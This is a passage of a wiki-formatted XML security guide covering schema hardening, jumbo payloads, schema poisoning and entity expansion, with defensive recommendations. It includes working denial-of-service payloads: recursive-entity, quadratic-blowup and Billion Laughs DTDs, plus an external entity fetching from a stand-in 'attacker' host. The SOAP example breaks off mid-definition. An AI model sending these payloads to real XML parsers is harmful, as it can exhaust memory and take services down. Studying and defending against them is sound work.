  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
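&lt;br /&gt;
Numeric values can be bounded in a similar way. Note that &amp;lt;tt&amp;gt;xs:integer&amp;lt;/tt&amp;gt; has no upper or lower bound, whereas &amp;lt;tt&amp;gt;xs:int&amp;lt;/tt&amp;gt; is limited to the 32-bit signed range. The following sketch assumes a hypothetical &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element that accepts values from 1 to 1000; both bounds are arbitrary and would need to match what the application can actually store:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- xs:int already excludes values outside the 32-bit signed range --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:int&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- assumed business limits, inclusive on both ends --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;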
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider the entire range of numbers valid except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can force the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum amount, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
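&lt;br /&gt;
A bounded variant of the previous schema might look like the following sketch. The limit of 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements is an arbitrary assumption; an appropriate value depends on how many items the application can safely process in one request:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed cap: at least 1 and at most 100 buy elements --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; minOccurs=&amp;quot;1&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
With such a limit in place, a document carrying more &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements than the declared maximum fails validation instead of reaching the application logic.&lt;br /&gt;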
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;largevalue&amp;quot; largename2=&amp;quot;largevalue&amp;quot; largename3=&amp;quot;largevalue&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee (or by an external attacker in control of these files) could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(A 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(A 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to ten references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these expands to ten references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory are consumed by expanding 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, or 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
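&lt;br /&gt;
The growth described above can be checked with a short Python calculation. This is a sketch of the arithmetic only; the function name &amp;lt;tt&amp;gt;billion_laughs_size&amp;lt;/tt&amp;gt; and its parameters are hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
def billion_laughs_size(base_text: str, fan_out: int, levels: int) -> int:
    """Length of the fully expanded top-level entity.

    base_text is the innermost entity value, fan_out is the number of
    references each level makes to the level below, and levels is the
    number of nested entity definitions.
    """
    return len(base_text) * fan_out ** levels


# Values read from the example: LOL is 3 characters long, and LOL1 to LOL9
# each contain 10 references to the previous entity.
copies = 10 ** 9
characters = billion_laughs_size("LOL", fan_out=10, levels=9)

print(copies)      # number of LOL strings produced
print(characters)  # total characters after expansion
```
&lt;br /&gt;
Each additional level multiplies the result by ten while adding only one short line to the DTD.&lt;br /&gt;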
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely, so a SOAP processor can reject any SOAP message that contains a DTD. Despite this, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser does not follow the specification and accepts a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE soap:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
